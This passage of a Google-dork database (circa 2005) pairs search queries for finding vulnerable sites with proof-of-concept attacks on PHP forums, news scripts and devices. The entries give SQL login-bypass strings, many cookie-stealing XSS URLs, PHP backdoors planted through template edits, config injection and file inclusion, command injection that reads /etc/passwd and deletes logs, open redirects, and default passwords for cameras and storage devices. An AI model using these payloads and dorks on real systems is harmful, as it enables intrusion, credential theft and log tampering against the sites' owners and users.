Gravity Board X v1.1 (possibly prior versions) <br>
Remote code execution, SQL Injection / Login Bypass, cross site scripting, path <br>
disclosure poc <br>
<br>
software: <br>
author site: http://www.gravityboardx.com/ <br>
<br>
<br>
a) Sql Injection / Login Bypass: <br>
<br>
If magic_quotes off, A user can bypass login check and grant administrator privileges on target <br>
system: <br>
<br>
login: ' or isnull(1/0) /* <br>
password: whatever <br>
<br>
<br>
<br>
b) Cross site scripting poc: <br>
<br>
b.1)After he login as administrator he can edit template to insert evil javascript <br>
code. Try to insert at the end of the template these lines: <br>
<br>
</STYLE> <br>
alert(document.cookie) <br>
<br>
b.2)A user can craft a malicious url like this to access target user cookies: <br>
<br>
http://[target]/[path]/deletethread.php?board_id=">alert(document.cookie) <br>
<br>
<br>
<br>
c) Remote commands/php code execution: <br>
<br>
c.1) Always editing the template, attacker can leave a backdoor in target system, <br>
example, at the end of template: <br>
<br>
</STYLE> <br>
<?php <br>
error_reporting(0); //to show no errors when page is called normally <br>
system($HTTP_GET_VARS[cmd]); <br>
?> <br>
<br>
After, the attacker can launch commands by this urls: <br>
<br>
http://[target]/[path]/index.php?cmd=ls%20-la <br>
<br>
to list directories... <br>
<br>
http://[target]/[path]/index.php?cmd=cat%20/etc/passwd <br>
<br>
to see Unix /etc/passwd file <br>
<br>
http://[target]/[path]/index.php?cmd=cat%20config.php <br>
<br>
to see database username/password <br>
<br>
c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling <br>
editcss.php script, look at the code of this script: <br>
<br>
if($fp = fopen('gbxfinal.css','w')){ <br>
fwrite($fp, $csscontent); <br>
fclose($fp); <br>
echo ''; <br>
}else{ <br>
echo 'Gravity Board X was unable to save changes to the CSS template.'; <br>
} <br>
<br>
you can easily deface the forum and/or insert a backdoor calling an url like this: <br>
<br>
http://[target]/[path]/editcss.php?csscontent=</style><?php%20system($HTTP_GET_VARS[cmd]);%20?> <br>
<br>
then execute commands: <br>
<br>
http://[target]/[path]/index?cmd=[command] <br>
<br>
It's also possible to disclose path: <br>
<br>
d) path disclosure: <br>
<br>
http://[target]/[path]/deletethread.php?perm=1 <br>
http://[target]/[path]/ban.php <br>
http://[target]/[path]/addnews.php <br>
http://[target]/[path]/banned.php <br>
http://[target]/[path]/boardstats.php <br>
http://[target]/[path]/adminform.php <br>
http://[target]/[path]/forms/admininfo.php <br>
http://[target]/[path]/forms/announcements.php <br>
http://[target]/[path]/forms/banform.php <br>
<br>
ans so on...calling scripts in /forms directory <br>
[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Powered+by+Gravity+Board%22&btnG=Cerca+con+Google&meta=[url]]
[[dork]"Powered by Gravity Board"[dork]]
[end][1362]]
[[start][1363]
[[title]"Powered by SilverNews"[title]]
[[descr]Silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting <br>
<br>
software: <br>
author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews <br>
<br>
<br>
SQL Injection / Login bypass: <br>
<br>
A user can bypass admin password check, if magic_quotes is set to off: <br>
<br>
user: ' or isnull(1/0) /* <br>
pass: whatever <br>
<br>
<br>
remote commands execution: <br>
<br>
now, new admin can edit template, clicking on Templates -> Global footer, can <br>
add the lines: <br>
<br>
//*********************************************** <br>
</body> <br>
</html> <br>
<br>
TEMPLATE; <br>
} <br>
} <br>
system($HTTP_GET_VARS[command]); <br>
<br>
/* <br>
<br>
to leave a backdoor in template file /templates/tpl_global.php <br>
now can launch system commands on the target system with theese urls: <br>
<br>
http://[target]/[path]//templates/tpl_global.php?command=ls%20-la <br>
<br>
<br>
to list directories <br>
<br>
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd <br>
<br>
to see /etc/passwd file <br>
<br>
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php <br>
<br>
to see Mysql database password <br>
<br>
<br>
cross site scripting: <br>
<br>
same way, a user can hide evil javascript code in template [descr]]
[[url]http://www.google.com/search?hl=it&c2coff=1&q=%22Powered+by+SilverNews%22&btnG=Cerca&lr=[url]]
[[dork]"Powered by SilverNews"[dork]]
[end][1363]]
[[start][1364]
[[title]PHPFreeNews inurl:Admin.php[[title]]
[[descr]29/07/2005 8.36.03<br>
<br>
PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure <br>
<br>
<br>
author site: http://www.phpfreenews.co.uk/Main_Intro.php<br>
<br>
xss poc:<br>
http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)<br>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=")}//-->alert(document.cookie)<br>
http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=")}//-->alert(document.cookie)<br>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=")}//-->alert(document.cookie)<br>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=")}//-->alert(document.cookie)<br>
http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=")}//-->alert(document.cookie)<br>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=")}//-->alert(document.cookie)<br>
http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=")}//-->alert(document.cookie)<br>
<br>
also a user can craft a url to redirect a victim to an evil site:<br>
<br>
http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]<br>
<br>
path disclosure:<br>
<br>
http://[target]/[path]/inc/ArchiveOldNews.php<br>
http://[target]/[path]/inc/Categories.php<br>
http://[target]/[path]/inc/CheckLogout.php<br>
http://[target]/[path]/inc/CommentsApproval.php<br>
http://[target]/[path]/inc/Images.php<br>
http://[target]/[path]/inc/NewsList.php<br>
http://[target]/[path]/inc/Password.php<br>
http://[target]/[path]/inc/Post.php<br>
http://[target]/[path]/inc/PostsApproval.php<br>
http://[target]/[path]/inc/PurgeOldNews.php<br>
http://[target]/[path]/inc/SetSticky.php<br>
http://[target]/[path]/inc/SetVisible.php<br>
http://[target]/[path]/inc/Statistics.php<br>
http://[target]/[path]/inc/Template.php<br>
http://[target]/[path]/inc/UserDefinedCodes.php<br>
http://[target]/[path]/inc/Users.php<br>
<br>
information disclosure:<br>
googledork:<br>
PHPFreeNews inurl:Admin.php<br>
(with this, you can passively fingerprint the server, PHP & MySQL version are in Google description...<br>
because this info are shownwed with non-chalance in admin.php page ;) )<br>
<br>
default password:<br>
login: Admin<br>
pass: Admin<br>
<br>
MySQL Injection / Login Bypass in previous versions:<br>
login: Admin<br>
password: ') or isnull(1/0) or ('a'='a<br>
<br>
note: all string, not consider 'or'<br>
<br>
in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: <br>
<br>
login: whateverpass: //') or isnull(1/0) /* this is definetely patched in 1.40 version<br>
[descr]]
[[url]http://www.google.com/search?q=PHPFreeNews+inurl:Admin.php&hl=it&lr=&filter=0[url]]
[[dork]PHPFreeNews inurl:Admin.php[dork]]
[end][1364]]
[[start][1365]
[[title]inurl:nquser.php filetype:php[[title]]
[[descr]Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit <br>
<br>
software: <br>
author site: http://www.virtech.org/tools/ <br>
<br>
a user can execute command on target system by PING panel, if enabled like often happens, using pipe char on <br>
input text "Ping IP Address or Host Name", example: <br>
<br>
| cat /etc/passwd <br>
<br>
then you will see plain text password file <br>
<br>
| pwd <br>
<br>
to see current path <br>
<br>
| rm [pwd_output]/logs/nq_log.txt <br>
<br>
to delete log file... <br>
<br>
disclosure of user activity: <br>
if enabled, a user can view clear text log file through url: <br>
<br>
http://[target]/[path]/logs/nq_log.txt <br>
<br>
xss: <br>
http://[target]/[path]/submit.php?portnum="/>alert(document.cookie) <br>
http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) <br>
http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) <br>
http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) <br>
http://[target]/[path]/nqports.php?step=alert(document.cookie) <br>
http://[target]/[path]/nqports2.php?step=alert(document.cookie) <br>
http://[target]/[path]/nqports2.php?body=alert(document.cookie) <br>
http://[target]/[path]/portlist.php?portnum=alert(document.cookie) <br>
<br>
<br>
a user can use on-line Netquery installations like proxy servers <br>
to launch exploit from HTTP GET request panel, example: <br>
exploiting Phpbb 2.0.15: <br>
make a get request of <br>
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command].'&command=cat%20/etc/passwd [descr]]
[[url]http://www.google.com/search?hl=it&q=inurl%3Anquser.php+filetype%3Aphp&btnG=Cerca+con+Google&meta=[url]]
[[dork]inurl:nquser.php filetype:php[dork]]
[end][1365]]
[[start][1366]
[[title]"Powered By: Simplicity oF Upload" inurl:download.php | inurl:upload.php[[title]]
[[descr]26/07/2005 16.09.18<br>
<br>
Simplicity OF Upload 1.3 (possibly prior versons) remote code execution <br>
& cross site scripting<br>
<br>
software: <br>
author site: http://www.phpsimplicity.com/scripts.php?id=3<br>
<br>
<br>
remote commands execution:<br>
<br>
problem at line 25-30: <br>
...<br>
//check for language overriding..<br>
if (isset($_GET['language']))<br>
$language = strtolower($_GET['language']);<br>
<br>
//now we include the language file<br>
require_once("$language.lng");<br>
...<br>
<br>
you can include whatever adding a null byte to "language" parameter value:<br>
<br>
example:<br>
http://localhost:30/simply/download.php?language=upload.php%00<br>
<br>
you will see upload & download page together :)<br>
<br>
so you can upload a cmd.gif (when you upload a .php file, usually it is<br>
renamed to .html...) file with this php code inside to execute<br>
commands:<br>
<br>
<?php<br>
<br>
system($HTTP_GET_VARS[command]);<br>
<br>
?><br>
<br>
then try this url:<br>
<br>
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls<br>
<br>
to list directories<br>
<br>
http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd<br>
<br>
to show /etc/passwd file<br>
<br>
cross site scripting:<br>
<br>
also, a remote user can supply a specially crafted URL to redirect other people<br>
to an evil page:<br>
<br>
http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00<br>
<br>
<br>
<br>
googledork:<br>
<br>
"Powered By: Simplicity oF Upload"<br>
[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Powered+By%3A+Simplicity+oF+Upload%22+inurl%3Adownload.php+%7C+inurl%3Aupload.php&btnG=Cerca+con+Google&meta=[url]]
[[dork]"Powered By: Simplicity oF Upload" inurl:download.php | inurl:upload.php[dork]]
[end][1366]]
[[start][1367]
[[title]"Powered by FlexPHPNews" inurl:news | inurl:press[[title]]
[[descr]24/07/2005 2.38.13<br>
<br>
Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting & resource consumption poc exploit<br>
<br>
<br>
software:<br>
author site:<br>
http://www.china-on-site.com/flexphpnews/downloads.php<br>
<br>
<br>
xss / cookie disclosure:<br>
<br>
http://[target]/[path]/index.php?front_indextitle=</title>alert(document.cookie)<br>
http://[target]/[path]/index.php?front_searchsubmit=">alert(document.cookie)<br>
http://[target]/[path]/index.php?front_latestnews=">alert(document.cookie)<br>
<br>
http://[target]/[path]/news.php?newsid=">alert(document.cookie)<br>
http://[target]/[path]/news.php?front_rating=">alert(document.cookie)<br>
http://[target]/[path]/news.php?salt=">alert(document.cookie)<br>
http://[target]/[path]/news.php?front_letmerateit=">alert(document.cookie)<br>
http://[target]/[path]/news.php?front_ratebest=">alert(document.cookie)<br>
http://[target]/[path]/news.php?front_ratesubmit=">alert(document.cookie)<br>
http://[target]/[path]/news.php?front_searchsubmit=">alert(document.cookie)<br>
<br>
http://[target]/[path]/search.php?front_searchresult=</title>alert(document.cookie)<br>
http://[target]/[path]/search.php?front_searchsubmit=">alert(document.cookie)<br>
<br>
http://[target]/[path]/catalog.php?front_searchsubmit=">alert(document.cookie)<br>
http://[target]/[path]/catalog.php?front_latestnews=">alert(document.cookie)<br>
http://[target]/[path]/catalog.php?catalogid=">alert(document.cookie)<br>
<br>
<br>
path disclosure:<br>
<br>
http://[target]/[path]/admin/usercheck.php?logincheck=%00<br>
<br>
<br>
denial of service / resources consumption:<br>
<br>
http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999<br>
http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999<br>
<br>
($prenumber and $nextnumber are uninitialized final values of a loop...)<br>
<br>
<br>
<br>
sql injection / bypass authentication:<br>
<br>
<br>
go to login page:<br>
<br>
http://[target]/[path]/admin/<br>
<br>
(usually admin if not changed)<br>
<br>
login as user: ' OR 'a'='a<br>
and pass : ' OR 'a'='a <br>
<br>
boom! you're admin ...<br>
<br>
the problem is in usercheck.php at line 5:<br>
<br>
$sql = "select username from newsadmin where username='$checkuser' and password='$checkpass'";<br>
<br>
you can post always true statements, like 'a'='a'<br>
<br>
solution: replace $checkuser and $checkpass vars with your username and pass, by the moment<br>
[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Powered+by+FlexPHPNews%22+inurl%3Anews+%7C+inurl%3Apress&meta=[url]]
[[dork]"Powered by FlexPHPNews" inurl:news | inurl:press[dork]]
[end][1367]]
[[start][1368]
[[title]"Powered by FunkBoard"[title]]
[[descr]FunkBoard V0.66CF (possibly prior versions) cross site scripting, <br>
possible database username/password disclosure & board takeover, <br>
possible remote code execution <br>
<br>
<br>
software: <br>
author site: http://www.[path_to_funkboard].co.uk/ <br>
<br>
xss: <br>
http://[target]/[path_to_funkboard]/editpost.php?fbusername=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/editpost.php?fbpassword=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/prefs.php?fbpassword=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/prefs.php?fbusername=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/profile.php?fbusername=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/profile.php?fbpassword=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?fbusername=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?fmail=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?www=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?icq=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?yim=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?location=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?sex=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?interebbies=">alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?sig=</textarea>alert(document.cookie) <br>
http://[target]/[path_to_funkboard]/register.php?aim=">alert(document.cookie) <br>
<br>
path disclosure: <br>
http://[target]/[path_to_funkboard]/images/forums.php <br>
<br>
database username & password disclosure: <br>
<br>
during installation is not remembered to delete the mysql_install script and the installation <br>
do not delete it, usually: <br>
<br>
http://[target]/[path]/admin/mysql_install.php <br>
<br>
or <br>
<br>
http://[target]/[path]/admin/pg_install.php <br>
<br>
there, a user can see database clear text username & password ... <br>
<br>
Then, the script let the user proceed to the next page, where he can reset funkboard administator <br>
username & password. Now the script faults, because some tables exist, etc. <br>
So user can go back and setting a new database name for installation, guessing among other <br>
installations on the server... <br>
Once Installation succeeded he can set new admin username e password then login at this page: <br>
<br>
http://[target]/[path]/[path_to_funkboard]/admin/index.php <br>
<br>
Now the user can edit templates and append some evil javascript code. <br>
<br>
<br>
remote code execution: <br>
<br>
look at this code in mysql_install.php : <br>
<br>
$infoout = "<?php\n\n// server name, eg. localhost\n\$server = '$server1';\n// your database's name\n\$dbname = '$dbname1';\n// your username to access that database\n\$dbuser = '$dbuser1';"; <br>
$infoout.= "\n// your password to access that database\n\$dbpass = '$dbpass1';\n\n// a contact email for when errors arise\n\$email = '$email1';"; <br>
$infoout.= "\n\n// database engine- 'mysql' or 'postgres'\n\$dbtype='$dbtype1';\n\n?>"; <br>
<br>
echo "Writing Config File<br>"; <br>
unlink ("../info.php"); <br>
<br>
$outname="../info.php"; <br>
$file = fopen($outname,"w+"); <br>
fputs($file, $infoout); <br>
fclose($file); <br>
<br>
clearly, you can inject php code, example: <br>
<br>
go to http://[target]/[path]/admin/mysql_install.php <br>
<br>
in email field (not checked) write: <br>
<br>
email@domain.com'; error_reporting(0); system($HTTP_GET_VARS[command]); echo ' <br>
<br>
press continue... <br>
<br>
now look at info.php, the config file in main directory, you have: <br>
<br>
<?php <br>
<br>
// server name, eg. localhost <br>
$server = 'localhost'; <br>
// your database's name <br>
$dbname = 'dbname'; <br>
// your username to access that database <br>
$dbuser = 'dbuser'; <br>
// your password to access that database <br>
$dbpass = 'dbpassword'; <br>
<br>
// a contact email for when errors arise <br>
$email = 'email@domain.com'; error_reporting(0); system($HTTP_GET_VARS[command]); echo ''; <br>
<br>
// database engine- 'mysql' or 'postgres' <br>
$dbtype='mysql'; <br>
<br>
?> <br>
<br>
so, you have a backdoor on target system... <br>
<br>
you can launch commands by this urls: <br>
<br>
http://localhost:30/funkboard/info.php?command=ls%20-la <br>
<br>
to list directories... <br>
<br>
http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd <br>
<br>
to see /etc/passwd file <br>
[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Powered+by+FunkBoard%22&btnG=Cerca+con+Google&meta=[url]]
[[dork]"Powered by FunkBoard"[dork]]
[end][1368]]
[[start][1369]
[[title]"Summary View of Sensors" | "sensorProbe8 v *" | "cameraProbe 3.0" -filetype:pdf -filetype:html[[title]]
[[descr]sensorProbe is a SNMP enabled and Web based Environmental Monitoring Device. The sensors attached to this device can monitor temperature, humidity, water leakage and air flow, etc. It does support other sensors which can monitor voltage drop, security, analog and dry contacts. The sensorProbe monitors your equipment's environmental variations, and alerts you through "Email , SMS or SNMP Alerts in your Network Management system" in advance and prevent any disaster. [descr]]
[[url]http://www.google.com/search?q=%22Summary+View+of+Sensors%22+%7C+%22sensorProbe8+v+*%22+%7C+%22cameraProbe+3.0%22+-filetype:pdf+-filetype:html++-site:ihackstuff.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]"Summary View of Sensors" | "sensorProbe8 v *" | "cameraProbe 3.0" -filetype:pdf -filetype:html -site:ihackstuff.com[dork]]
[end][1369]]
[[start][1370]
[[title]intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co[[title]]
[[descr][quote]Cisco CallManager<br>
<br>
CallManager is a FREE web application/interface included with your VoIP telephone service. It allows you to change and update settings on your phone without having to contact the Telecommunications Help Desk.<br>
<br>
Voice over IP telephone users –<br>
Logon to Cisco CallManager at: http://XXXXXX/ccmuser/logon.asp<br>
<br>
* User ID – your UWYO Domain username<br>
* Password – initial password is 12341234<br>
<br>
Please create your own unique password after your initial logon<br>
<br>
[/quote]<br>
<br>
There are several vulnerbilities for CallManager<br>
[descr]]
[[url]http://www.google.com/search?q=intitle:%22Cisco+CallManager+User+Options+Log+On%22+%22Please+enter+your+User+ID+and+Password+in+the+spaces+provided+below+and+click+the+Log+On+button+to+continue.%22++-edu&num=100&lr=&newwindow=1&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to continue." -edu[dork]]
[end][1370]]
[[start][1371]
[[title]intitle:"Owl Intranet " intext:"Owl Intranet Engine" +"Version:" inurl:/intranet/ -edu -ac -gov -org[[title]]
[[descr]Owl Intranet Engine is prone to multiple cross-site scripting and SQL injection vulnerabilities. The issues are reported to exist in the 'browse.php' script.<br>
<br>
An attacker could exploit the cross-site scripting issues by enticing a victim user into following a malicious link that contains hostile HTML and script code. This could be exploited to steal cookie-based authentication credentials.<br>
<br>
The SQL injection vulnerabilities could allow the attacker to influence the structure or logic of SQL queries made by the application. This could have various impacts, including compromise of the software, exposure and modification of sensitive information, or a potential for attacks against the database implementation itself.<br>
<br>
The attacker may need to provide a valid session ID to exploit these issues.<br>
<br>
you can also download some of the files where security is not that strong for the anon user.<br>
<br>
[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1371]]
[[start][1372]
[[title]intitle:"Powered by OneOrZero" intext:"Powered by OneOrZero v1.4" "login" inurl:helpdesk -demo -edu[[title]]
[[descr]An SQL injection issue has been reported to affect OneOrZero Helpdesk. The error presents itself in a OneOrZero Helpdesk script that fails to sufficiently sanitize user-supplied input before including it in SQL queries.<br>
<br>
Successful exploitation could result in compromise of the OneOrZero Helpdesk site integrity.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=intitle%3A%22Powered+by+OneOrZero%22+intext%3A%22Powered+by+OneOrZero+v1.4%22+%22login%22+inurl%3Ahelpdesk+-demo+-edu&btnG=Search[url]]
[[dork]intitle:"Powered by OneOrZero" intext:"Powered by OneOrZero v1.4" "login" inurl:helpdesk -demo -edu[dork]]
[end][1372]]
[[start][1380]
[[title]intitle:"blog torrent upload"[title]]
[[descr]Blog Torrent is free, open-source software that provides a way to share large files on your website.<br>
<br>
vulnerability: free access to the password file<br>
http://[target]/[path_of_blog]/data/newusers<br>
<br>
advisory:<br>
http://www.securitytracker.com/alerts/2005/Jul/1014449.html<br>
<br>
All current versions could be vulnerable depending on directory permissions. [descr]]
[[url]http://www.google.com/search?q=+intitle%3A%22blog+torrent+upload%22+&sstart=0&start=0&ie=utf-8&oe=utf-8[url]]
[[dork] intitle:"blog torrent upload" [dork]]
[end][1380]]
[[start][1381]
[[title]intitle:MyShell 1.1.0 build 20010923[[title]]
[[descr]Basicly MyShell is a php program that allows you to execute commands remotely on whichever server it's hosted on.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3AMyShell+1.1.0+build+20010923&btnG=Search[url]]
[[dork]intitle:MyShell 1.1.0 build 20010923[dork]]
[end][1381]]
[[start][1382]
[[title]intitle:"Network Storage Link for USB 2.0 Disks" Firmware[[title]]
[[descr]Networked USB hard drives (NSLU2). Be sure to disable Google's filter (&filters=0) as that is where they pop up. Default password (Linksys) is admin:admin (just like all the rest). A majority are locked some are not. Some logins to the NSLU2 will be a link off a website. Enjoy.[descr]]
[[url]http://www.google.com/search?q=intitle:Network%2BStorage%2BLink%2Bfor%2BUSB%2B2.0+Disks+intext:Disks+User+Log+in+(Private+Data)+++DISK+(Private+Data)+FLASH+(Public+Data)+Firmware+Version++&hl=en&hs=Yms&lr=&client=firefox-a&rls=org.mozilla:en-US:official&[url]]
[[dork]intitle:Network+Storage+Link+for+USB+2.0 Disks intext:Disks User Log in (Private Data) DISK (Private Data) FLASH (Public Data) Firmware Version [dork]]
[end][1382]]
[[start][1384]
[[title]intitle:"AlternC Desktop"[title]]
[[descr]This finds the login page for AlternC Desktop I dont know what versions.[descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22AlternC+Desktop%22[url]]
[[dork]intitle:"AlternC Desktop"[dork]]
[end][1384]]
[[start][1385]
[[title]intitle:"communigate pro * *" intitle:"entrance"[title]]
[[descr]Just reveals the login for Communigate Pro webmail. A brute force attack could be attempted. The directory link from this page can in some instances be used to query user information.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22communigate+pro+*+*%22+intitle%3A%22entrance%22&btnG=Search[url]]
[[dork]intitle:"communigate pro * *" intitle:"entrance"[dork]]
[end][1385]]
[[start][1386]
[[title]inurl:index.php fees shop link.codes merchantAccount[[title]]
[[descr]Vulnerability in EPay systems<br>
PHP code including<br>
http://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwd<br>
advisory:<br>
http://www.cyberlords.net/advisories/cl_epay.txt<br>
<br>
EPay Pro version 2.0 is vulnerable to this issue.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aindex.php+fees+shop+link.codes+merchantAccount+&btnG=Search[url]]
[[dork]inurl:index.php fees shop link.codes merchantAccount [dork]]
[end][1386]]
[[start][1389]
[[title]intitle:"admin panel" +"Powered by RedKernel"[title]]
[[descr]This finds all versions of RedKernel Referer Tracker(stats page) it just gives out some nice info[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22admin+panel%22+%2B%22Powered+by+RedKernel%22+-site%3Aihackstuff.com&btnG=Search[url]]
[[dork]intitle:"admin panel" +"Powered by RedKernel" -site:ihackstuff.com[dork]]
[end][1389]]
[[start][1390]
[[title]intitle:phpnews.login[[title]]
[[descr]Vulnerable script auth.php (SQL injection)<br>
<br>
--- from rst.void.ru ---<br>
Possible scenario of attack:<br>
[1] log in admin panel, using SQL injection<br>
[2] upload PHP file through "Upload Images" function (index.php?action=images) and have fun with php shell<br>
or edit template (index.php?action=modtemp) and put backdoor code into it.<br>
-------------------------<br>
<br>
http://www.securityfocus.com/bid/14333/info<br>
http://rst.void.ru/papers/advisory31.txt<br>
<br>
The version number may be found sometimes in error messages.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3Aphpnews.login+&btnG=Search[url]]
[[dork]intitle:phpnews.login [dork]]
[end][1390]]
[[start][1392]
[[title]"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com[[title]]
[[descr]This finds all versions of the inspanel login page.[descr]]
[[url]http://www.google.com/search?q=%22inspanel%22+intitle:%22login%22+-%22cannot%22+%22Login+ID%22+-site:inspediumsoft.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com[dork]]
[end][1392]]
[[start][1393]
[[title]intitle:iDVR -intitle:"com | net | shop" -inurl:"asp | htm | pdf | html | php | shtml | com | at | cgi | tv"[title]]
[[descr]Online camera. Default login is administrator and password blank. Video server runs default on port 2000. There is an application DVR Center that is used to connect to server and manage recorded videos. [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1393]]
[[start][1394]
[[title]"HostingAccelerator" intitle:"login" +"Username" -"news" -demo[[title]]
[[descr]This will find the login portal for HostingAccelerator ControlPanel I have not looked for exploits for these so i dont know if their are any. So far i have seen versions 1.9 2.2 and 2.4 found by this dork.[descr]]
[[url]http://www.google.com/search?q=%22HostingAccelerator%22+intitle:%22login%22+%2B%22Username%22+-%22news%22+-demo&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]"HostingAccelerator" intitle:"login" +"Username" -"news" -demo[dork]]
[end][1394]]
[[start][1395]
[[title]intitle:"INTELLINET" intitle:"IP Camera Homepage"[title]]
[[descr] This googledork finds INTELLINET ip cameras. They are used to monitor things and have a web interface. Most of the pages load with the default username and password of guest. The user manual says that the default admin username/password is admin/admin. At the time of posting this googledork had 10 results.<br>
<br>
p.s. This was discovered by jeffball55 and cleaned up by golfo[descr]]
[[url]http://www.google.com/search?q=intitle:%22INTELLINET%22+intitle:%22IP+Camera+Homepage%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0[url]]
[[dork]intitle:"INTELLINET" intitle:"IP Camera Homepage"[dork]]
[end][1395]]
[[start][1396]
[[title]"Powered by Zorum 3.5"[title]]
[[descr]Zorum 3.5 remote code execution poc exploit<br>
<br>
software:<br>
description: Zorum is a freely available, open source Web-based forum<br>
application implemented in PHP. It is available for UNIX, Linux, and any other<br>
platform that supports PHP script execution.<br>
<br>
author site: http://zorum.phpoutsourcing.com/<br>
<br>
<br>
1) remote code execution:<br>
<br>
vulnerable code, in /gorum/prod.php file:<br>
<br>
<br>
07 $doubleApp = isset($argv[1]); <br>
<br>
...<br>
14 if( $doubleApp )<br>
15 {<br>
16 $appDir = $argv[1];<br>
17 system("mkdir $prodDir/$appDir");<br>
...<br>
<br>
a user can execute arbitrary commands using pipe char, example:<br>
<br>
http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la<br>
<br>
to list directories<br>
<br>
http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php<br>
<br>
to see database username/password...<br>
<br>
http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd<br>
<br>
to see /etc/passwd file<br>
<br>
<br>
<br>
2) path disclosure:<br>
<br>
http://[target]/zorum/gorum/notification.php<br>
http://[target]/zorum/user.php<br>
http://[target]/zorum/attach.php<br>
http://[target]/zorum/blacklist.php<br>
http://[target]/zorum/forum.php<br>
http://[target]/zorum/globalstat.php<br>
http://[target]/zorum/gorum/trace.php<br>
http://[target]/zorum/gorum/badwords.php<br>
http://[target]/zorum/gorum/flood.php<br>
<br>
and so on...<br>
<br>
googledork:<br>
<br>
"Powered by Zorum 3.5"<br>
<br>
<br>
rgod<br>
site: http://rgod.altervista.org<br>
mail: retrogod at aliceposta it<br>
<br>
original advisory: http://rgod.altervista.org/zorum.html<br>
[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Powered+by+Zorum+3.5%22&meta=[url]]
[[dork]"Powered by Zorum 3.5"[dork]]
[end][1396]]
[[start][1397]
[[title]intitle:"xams 0.0.0..15 - Login"[title]]
